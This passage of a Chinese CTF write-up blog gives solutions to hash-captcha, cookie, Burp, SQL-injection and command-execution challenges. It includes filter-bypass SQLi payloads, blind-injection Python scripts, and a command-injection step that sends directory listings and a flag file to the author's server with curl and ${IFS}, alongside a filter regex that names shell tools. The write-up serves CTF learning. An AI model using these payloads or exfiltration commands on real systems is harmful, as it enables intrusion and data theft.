class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Name</span></span><br><span class="line">name = raw_input().split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">_name = list()</span><br><span class="line">_name.append(name[<span class="number">0</span>])</span><br><span class="line">_name.append(<span class="string">&#x27;&#x27;</span>.join(name[<span class="number">1</span>:]))</span><br><span class="line">_name += Permutations.WordCombination(name)</span><br><span class="line">name = list()</span><br><span class="line"><span class="keyword">for</span> n <span class="keyword">in</span> _name:</span><br><span class="line">    name += Permutations.LetterCase(n)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Birthday</span></span><br><span class="line">birthday = raw_input().split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">year = [birthday[<span class="number">0</span>], birthday[<span class="number">0</span>][<span class="number">-2</span>:]]</span><br><span class="line">month = [birthday[<span class="number">1</span>]]</span><br><span class="line"><span class="keyword">if</span> len(birthday[<span class="number">1</span>]) </span><br></pre></td></tr></table></figure>

<h2 id="验证码破解-350"><a href="#验证码破解-350" class="headerlink" title="验证码破解 (350)"></a>验证码破解 (350)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">要求编程解决哈希验证码破解</span><br><span class="line">关于哈希验证码</span><br><span class="line">观察下面一行代码</span><br><span class="line">    substr(md5(&#39;请在此输入验证码&#39;),0,6) &#x3D;&#x3D;&#x3D; &#39;dc55b0&#39;</span><br><span class="line">该行代码输要求我们入一个字符串，使得该字符串进行MD5运算之后的0到5位等于&#39;dc55b0&#39;</span><br><span class="line">该字符串称为哈希验证码</span><br><span class="line">测试时我们会准备一些不同种类且范围小于等于6位的待破解的验证码，根据破解出验证码的速度与时间以及内存的使用量对程序做一个估计与评价</span><br><span class="line"></span><br><span class="line">我们准备测试的哈希验证码种类包含: MD5、 SHA1以及SHA256</span><br><span class="line"></span><br><span class="line">提示：可以参考彩虹表以及鸽巢原理，从而大大加快验证码的破解速度</span><br><span class="line"></span><br><span class="line">语言限制为C或C++，源代码中最好包含注释，注意变量、函数等命名规范</span><br><span class="line"></span><br><span class="line">程序完成后请将源码打包发送至邮箱********@outlook.com，通过后我们会将flag发送给你</span><br><span class="line"></span><br><span class="line">此题推荐大二及以上学生，但如果大一学生完成此题则有加分奖励</span><br><span class="line"></span><br><span class="line">哈希函数（MD5,SHA1,SHA256）运算部分的代码可以参考使用互联网上的例子，其余代码严禁抄袭</span><br><span class="line"></span><br><span class="line">输入格式</span><br><span class="line">一共三行</span><br><span class="line">第一行为要破解的验证码种类，取值范围为&quot;MD5&quot;、&quot;SHA1&quot;或&quot;SHA256&quot;，字母大写</span><br><span class="line">第二行为要破解的验证码</span><br><span class="line">    可以保证是可破解的并且长度不超过6位</span><br><span class="line">第三行为要破解的验证码范围，包括两个整形数字，之间用空格分隔</span><br><span class="line">    可以保证范围合理，不超过6位并且不会超出哈希函数结果的范围（如不会出现&quot;99 105&quot;这种），并且范围和第二行的待破解验证码的长度相等</span><br><span class="line">如</span><br><span class="line">    MD5</span><br><span class="line">    dc55b0</span><br><span class="line">    0 5</span><br><span class="line">表示我们需要寻找一个字符串，使得该字符串经过MD5运算后的0到5位为&quot;dc55b0&quot;</span><br><span class="line">输出格式</span><br><span class="line">该验证码的破解结果</span><br><span class="line">如</span><br><span class="line">    3f2d81a</span><br><span class="line">表示字符串&quot;3f2d81a&quot;经过MD5运算后的0到5位为&quot;dc55b0&quot;</span><br><span class="line">更多例子</span><br><span class="line">输入</span><br><span class="line">    MD5</span><br><span class="line">    9d73</span><br><span class="line">    10 13</span><br><span class="line">表示我们需要寻找一个字符串，使得该字符串经过MD5运算后的10到13位为&quot;9d73&quot;</span><br><span class="line">输出</span><br><span class="line">    a05b9c</span><br><span class="line">表示字符串&quot;a05b9c&quot;经过MD5运算后的10到13位为&quot;9d73&quot;</span><br><span class="line"></span><br><span class="line">输入</span><br><span class="line">    SHA256</span><br><span class="line">    08a31f</span><br><span class="line">    1 6</span><br><span class="line">表示我们需要寻找一个字符串，使得该字符串经过SHA256运算后的1到6位为&quot;08a31f&quot;</span><br><span class="line">输出</span><br><span class="line">    c26bdc</span><br><span class="line">表示字符串&quot;c26bdc&quot;经过SHA256运算后的1到6位为&quot;08a31f&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p> 此类的哈希验证码在CTF竞赛中十分常见，需要碰撞一个最大长度为6的哈希，如果直接使用暴力破解的话效率十分低下，能多久跑出来就看命，但是如果使用彩虹表的话就完全不一样了。<br>这里只以最长的6位验证码为例，6位以下的更简单。<br> 首先分析一下，长度为6的哈希值，其范围为从000000~ffffff，也就是说一共有16^6=16777216种哈希值，这个数只到千万级别，不是很大。那么在理想情况（所有字符串产生的哈希值前六位均不同），我们只需要字符集0~f组成的6位16777216个不同的字符串，就一定可以得到所有的6位哈希值，但是现实中并没有这样的理想情况，这16777216个不同的字符串中有很大概率会有些字符串的哈希值前6位是相同的，为了降低这个概率，我们就需要更多的字符串。<br> 如果我们同样使用0~f的字符集，组成7位字符串，就会产生16^7=268435456种不同的哈希，这个数是6位字符串的16倍，已经到了亿级别了，可以有非常大的概率保证覆盖了000000~ffffff所有的哈希可能值，但是16^7又有点太大了，其中有很多冗余数据我们在查验证码的时候用不到，所以需要对范围进行调整，从0000000~3ffffff将会用到480M的内存，从0000000~4fffff会用掉700M的内存，当然范围越大准确率也越高，但是占的内存也越多。<br> 另外为了查询彩虹表方便，需要对彩虹表进行一定规律的排序，根据哈希值进行排序就能很快的移动文件指针找到对应行。<br>脚本如下(以MD5为例)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Generate</span>(<span class="params">ran1, ran2, filename</span>):</span></span><br><span class="line">    cache_dict = &#123;&#125;</span><br><span class="line">    length = ran2 - ran1</span><br><span class="line">    a = <span class="string">&#x27;%0&#x27;</span> + str(length + <span class="number">1</span>) + <span class="string">&#x27;x&#x27;</span></span><br><span class="line">    b = <span class="string">&#x27;%0&#x27;</span> + str(length) + <span class="string">&#x27;x&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">print</span> <span class="string">&#x27;[*]Generating cache...&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> length == <span class="number">7</span>:</span><br><span class="line">        ranges1 = <span class="number">0x3fffffff</span></span><br><span class="line">        ranges2 = <span class="number">0x10000000</span></span><br><span class="line">    <span class="keyword">elif</span> length == <span class="number">6</span>:</span><br><span class="line">        ranges1 = <span class="number">0x3ffffff</span></span><br><span class="line">        ranges2 = <span class="number">0x1000000</span></span><br><span class="line">    <span class="keyword">elif</span> length == <span class="number">5</span>:</span><br><span class="line">        ranges1 = <span class="number">0x3fffff</span></span><br><span class="line">        ranges2 = <span class="number">0x100000</span></span><br><span class="line">    <span class="keyword">elif</span> length == <span class="number">4</span>:</span><br><span class="line">        ranges1 = <span class="number">0x3ffff</span></span><br><span class="line">        ranges2 = <span class="number">0x10000</span></span><br><span class="line">    <span class="keyword">elif</span> length == <span class="number">3</span>:</span><br><span class="line">        ranges1 = <span class="number">0x3fff</span></span><br><span class="line">        ranges2 = <span class="number">0x1000</span></span><br><span class="line">    <span class="keyword">elif</span> length == <span class="number">2</span>:</span><br><span class="line">        ranges1 = <span class="number">0x3ff</span></span><br><span class="line">        ranges2 = <span class="number">0x100</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> xrange(ranges1):</span><br><span class="line">    <span class="comment"># for i in xrange(0xfffff):</span></span><br><span class="line">    <span class="comment"># for i in xrange(0x4fffff): # 700MB + RAM</span></span><br><span class="line">    <span class="comment"># for i in xrange(0x3fffff): # 480MB + RAM</span></span><br><span class="line">        s = a % i</span><br><span class="line">        sub_hash = md5(s).hexdigest()[ran1:ran2]</span><br><span class="line">        cache_dict[sub_hash] = s</span><br><span class="line">    <span class="keyword">print</span> <span class="string">&#x27;[*]Done.&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">print</span> <span class="string">&#x27;[*]Writing to disk...&#x27;</span></span><br><span class="line">    <span class="keyword">with</span> open(filename, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        miss = <span class="string">&#x27;*&#x27;</span> * (length + <span class="number">1</span>)</span><br><span class="line">        miss = <span class="string">&#x27;%s &#x27;</span> + miss + <span class="string">&#x27;n&#x27;</span></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(ranges2):</span><br><span class="line">            k = b % i</span><br><span class="line">            <span class="keyword">if</span> cache_dict.has_key(k):</span><br><span class="line">                f.write(<span class="string">&#x27;%s %sn&#x27;</span> % (k, cache_dict[k]))</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                f.write(miss % k)</span><br><span class="line">    <span class="keyword">print</span> <span class="string">&#x27;[*]Done.&#x27;</span></span><br><span class="line">    <span class="keyword">print</span> <span class="string">&#x27;[*]Saved as &#x27;</span>%s<span class="string">&#x27; at current directory.&#x27;</span> % filename</span><br><span class="line">    <span class="keyword">del</span> cache_dict</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Proof</span>(<span class="params">proof, filename</span>):</span></span><br><span class="line">    length = len(proof)</span><br><span class="line">    <span class="keyword">with</span> open(filename, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        offset = int(proof, <span class="number">16</span>) * (length + <span class="number">1</span> + length + <span class="number">1</span> + <span class="number">1</span>)</span><br><span class="line">        f.seek(offset)</span><br><span class="line">        result = f.read(length + <span class="number">1</span> + length + <span class="number">1</span>)</span><br><span class="line">        <span class="keyword">return</span> result.split()[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">generate(<span class="number">0</span>, <span class="number">6</span>, <span class="string">&#x27;dic.txt&#x27;</span>)</span><br><span class="line"><span class="keyword">print</span> proof(<span class="string">&#x27;dc55b0&#x27;</span>, <span class="string">&#x27;dic.txt&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<hr>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="cookie-150"><a href="#cookie-150" class="headerlink" title="cookie (150)"></a>cookie (150)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">你知道什么是cookie吗？</span><br><span class="line"></span><br><span class="line">(cookie本身并不是flag)</span><br><span class="line">http:&#x2F;&#x2F;*********:8080&#x2F;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>将cookie中give_me_the_flag的值改为1刷新即可<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911204309.png"></p>
<blockquote>
<p>flag{U_jus7_3dit_The_cookie}</p>
</blockquote>
<hr>
<h2 id="BabySQLi-200"><a href="#BabySQLi-200" class="headerlink" title="BabySQLi (200)"></a>BabySQLi (200)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Baby SQL injection.</span><br><span class="line"></span><br><span class="line">Hint: Backend using SQLite.</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;*******:25252&#x2F;</span><br><span class="line"></span><br><span class="line">注：此题仅限大一学生，大二及以上学生不计分</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这个题没什么难的，Hint也给了语句，什么也没过滤，告诉了flag在fl4g表里，直接注入就行，另外注意sqlite中没有井号（#）注释符</p>
<p>payload：’ union select * from fl4g –<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911205408.png"></p>
<blockquote>
<p>flag{B4BY_5q1_1nJec7i0n}</p>
</blockquote>
<hr>
<h2 id="BabyBurp-200"><a href="#BabyBurp-200" class="headerlink" title="BabyBurp (200)"></a>BabyBurp (200)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Change another way to visit a website?</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;*********&#x2F;BabyBurp.php</span><br><span class="line"></span><br><span class="line">hint: You should download a tool ----&gt;&quot;burp suite&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>下载<a target="_blank" rel="noopener" href="https://portswigger.net/burp">BurpSuit</a><br>开启代理拦截，题目里说“You may use your iphoneXXXXXX to find the flag?”，所以更改user agent为“iphoneXXXXXX”的即可。<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911205049.png"></p>
<blockquote>
<p>flag{Bu1p_1s_tH3_beSt}</p>
</blockquote>
<hr>
<h2 id="EasySQLi-220"><a href="#EasySQLi-220" class="headerlink" title="EasySQLi (220)"></a>EasySQLi (220)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Very easy SQl injection.</span><br><span class="line">What did I filter?</span><br><span class="line"></span><br><span class="line">Hint: Backend using SQLite</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;*******:25254&#x2F;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>继续用上一题的payload发现union、select和from被过滤掉了，用双写或大小写都能绕过<br>payload1：’ uNion selEct * frOm fl4g –<br>payload2：’ ununionion selselectect * frfromom fl4g –<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911205615.png"></p>
<blockquote>
<p>flag{50_ea5y_r1gh7}</p>
</blockquote>
<hr>
<h2 id="HardSQLi-250"><a href="#HardSQLi-250" class="headerlink" title="HardSQLi (250)"></a>HardSQLi (250)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">A little difficult SQL injection</span><br><span class="line">Really looks like the previous challenge?</span><br><span class="line"></span><br><span class="line">Hint: Backend using SQLite</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;*******:25255&#x2F;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>接着用第一题的payload测试，发现出了union、select和from被过滤外，空格也被过滤掉了，可以利用注释符/**/绕过，另外大小写不能绕过关键字的过滤，只有双写能绕过<br>payload：’/**/uniunionon/**/seselectlect/**/*/**/frfromom/**/fl4g/**/–/**/<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911205945.png"></p>
<blockquote>
<p>flag{4_b1t_0f_HaRd_hhhhhh}</p>
</blockquote>
<hr>
<h2 id="BadSQLi-300"><a href="#BadSQLi-300" class="headerlink" title="BadSQLi (300)"></a>BadSQLi (300)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">I heard only the real bad-ass can solve this challenge.</span><br><span class="line"></span><br><span class="line">Hint: Backend using SQLite.</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;srpopty.cn:25253&#x2F;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这个题除了前面那些过滤外，还过滤掉了所有空白字符，星号（*）以及逗号，只能盲注，空白字符可以用括号绕过<br>payload1（获取列名）：1’oorr(selorect(hex(sql))frorom(sqlite_master))like(‘%s%%’)–<br>payload2（获取flag）：1’oorr(selorect(hex(text))frorom(fl4g))like(‘%s%%’)–</p>
<p>脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">dic = string.hexdigits</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://123.206.86.208:25253/?id=&#x27;</span></span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">&quot;1&#x27;oorr(selorect(hex(sql))frorom(sqlite_master))like(&#x27;%s%%&#x27;)--&quot;</span></span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">&quot;1&#x27;oorr(selorect(hex(text))frorom(fl4g))like(&#x27;%s%%&#x27;)--&quot;</span></span><br><span class="line"></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> i &lt; len(dic):</span><br><span class="line">    payload = payload1 % (result + dic[i])</span><br><span class="line">    <span class="keyword">print</span> payload</span><br><span class="line">    ret = requests.get(url+payload)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;When&#x27;</span> <span class="keyword">in</span> ret.content:</span><br><span class="line">        result += dic[i]</span><br><span class="line">        <span class="keyword">print</span> <span class="string">&#x27;[+] &#x27;</span> + result</span><br><span class="line">        i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">&#x27;[*] Result: &#x27;</span> + result.decode(<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{ThI5_5q1i_s0_B4444d}</p>
</blockquote>
<hr>
<h2 id="RealSQL"><a href="#RealSQL" class="headerlink" title="RealSQL"></a>RealSQL</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Flag is admin&#39;s password.</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;********:23333&#x2F;</span><br></pre></td></tr></table></figure>

<p>这是一道真正的SQL注入题，不像前面的题目甚至给出了查询语句的样子，这个题什么也没有给，所以需要自己试一试哪些被过滤掉了，被过滤掉的字符都会弹出<br>“illegal character!!@_@”的提示，以此来判断哪些字符被过滤掉了。</p>
<p>大部分在登录或注册等界面的SQL注入，注入点基本都在username处，大部分网站在后端会把password进行哈希，与数据库中保存的进行比较，所以password不大可能有注入。</p>
<p>这里直接给出过滤的正则</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$filter = <span class="string">&quot;/ |\*|#|,|union|like|regexp|for|and|or|file|--|\||`|&amp;|&quot;</span>.urldecode(<span class="string">&#x27;%09&#x27;</span>).<span class="string">&quot;|&quot;</span>.urldecode(<span class="string">&quot;%0a&quot;</span>).<span class="string">&quot;|&quot;</span>.urldecode(<span class="string">&quot;%0b&quot;</span>).<span class="string">&quot;|&quot;</span>.urldecode(<span class="string">&#x27;%0c&#x27;</span>).<span class="string">&quot;|&quot;</span>.urldecode(<span class="string">&#x27;%0d&#x27;</span>).<span class="string">&quot;|&quot;</span>.urldecode(<span class="string">&#x27;%a0&#x27;</span>).<span class="string">&quot;/i&quot;</span>;  </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match($filter,$str))&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt; alert(&#x27;illegal character!!@_@&#x27;);parent.location.href=&#x27;index.php&#x27;; &lt;/script&gt;&quot;</span>;</span><br><span class="line">	<span class="keyword">exit</span>;</span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>(strrpos($str,urldecode(<span class="string">&quot;%00&quot;</span>)))&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt; alert(&#x27;illegal character!!@_@&#x27;);parent.location.href=&#x27;index.php&#x27;; &lt;/script&gt;&quot;</span>;</span><br><span class="line">	<span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到被过滤的有空格、空白字符、*、#、union、like、regexp、for、and、or、–、&amp;、|等常见的注入字符<br>但是还有一些SQL语句操作符没有被过滤掉</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!,!=,=,+,-,^,%,&gt;,&lt;,~</span><br></pre></td></tr></table></figure>

<p>首先测试uname，如果uname随便输入一个用户的话，会弹出“username error!!@_@”的提示，所以可以肯定有一次对uname的查询，以此首先来判断uname是否存在，那么猜测查询语句为</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> uname=<span class="string">&#x27;&#123;$input&#125;&#x27;</span></span><br></pre></td></tr></table></figure>
<p>其中$input为我们的输入，虽然过滤掉了所有的空白字符，但是有很多布尔以及算数运算符没有被过滤，那么就可以构造连续的布尔式获取数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select username from users where username&#x3D;&#39;&#39;!&#x3D;(mid((username)from(-1))&#x3D;&#39;a&#39;)</span><br></pre></td></tr></table></figure>
<p>如果(mid((username)from(-1))=’a’)返回了0，那么中间的表达式就会为false，整个表达式也会为false，如果返回了1，就代表查到了数据，因此可以提交</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname&#x3D;&#39;!&#x3D;(mid((passwd)from(-1))&#x3D;&#39;e&#39;)&#x3D;&#39;1&amp;passwd&#x3D;1</span><br></pre></td></tr></table></figure>
<p>这样一位一位的猜出来password<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># -*-  coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line">url = <span class="string">&quot;http://********:23333/login.php&quot;</span></span><br><span class="line"></span><br><span class="line">randstr = string.ascii_letters + string.digits + <span class="string">&#x27;&#125;_&#123;&#x27;</span></span><br><span class="line">remark = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">33</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> randstr:</span><br><span class="line">        passwd = i+remark</span><br><span class="line">        uname = <span class="string">&quot;&#x27;!=(mid((passwd)from(-&#123;j&#125;))=&#x27;&#123;passwd&#125;&#x27;)=&#x27;1&quot;</span>.format(</span><br><span class="line">            j=str(j), passwd=passwd)</span><br><span class="line">        data = &#123;<span class="string">&quot;uname&quot;</span>: uname, <span class="string">&quot;passwd&quot;</span>: <span class="string">&quot;ddd&quot;</span>&#125;</span><br><span class="line">        <span class="keyword">print</span> uname</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;password error!!&quot;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            remark = passwd</span><br><span class="line">            <span class="keyword">print</span> remark</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{THI5_1s_Real_sq1}</p>
</blockquote>
<hr>
<h2 id="Exec"><a href="#Exec" class="headerlink" title="Exec"></a>Exec</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Please do this challenge after you can login with admin.</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;********:23333&#x2F;</span><br></pre></td></tr></table></figure>

<p>这个题需要上个题登录到admin以后才能做，用上一题的flag登录成功后可以看到一个命令执行的界面，题目的目的非常简单，执行命令，但是看不到命令执行的结果，只能知道命令是否执行完成，另外此题对命令也做了一些过滤，但是并不是很难。</p>
<p>最简单的思路就是用反弹shell获取数据，但是对反弹shell也做了一些限制，过滤正则如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$filter &#x3D; &quot; |bash|perl|nc|java|php|&gt;|&gt;&gt;|wget|ftp|python|sh&quot;;</span><br></pre></td></tr></table></figure>
<p>空格可以使用${IFS}绕过，获取数据可以用curl<br>首先在自己的服务器上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -l -p 12345 -vv</span><br></pre></td></tr></table></figure>
<p>之后执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl<span class="variable">$&#123;IFS&#125;</span>***.***.***.***:12345/`ls<span class="variable">$&#123;IFS&#125;</span>-al|base64`</span><br></pre></td></tr></table></figure>
<p><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180924155642.png"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl<span class="variable">$&#123;IFS&#125;</span>123.206.86.208:12345/`cat<span class="variable">$&#123;IFS&#125;</span>flag_788f1a3aa1fa053f7fa6560d456f4b92|base64`</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{sql_iNJEct_comMond_eXEC!}</p>
</blockquote>
<hr>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="BabyCrypto-100"><a href="#BabyCrypto-100" class="headerlink" title="BabyCrypto (100)"></a>BabyCrypto (100)</h2><pre><code>Who is Caesar?
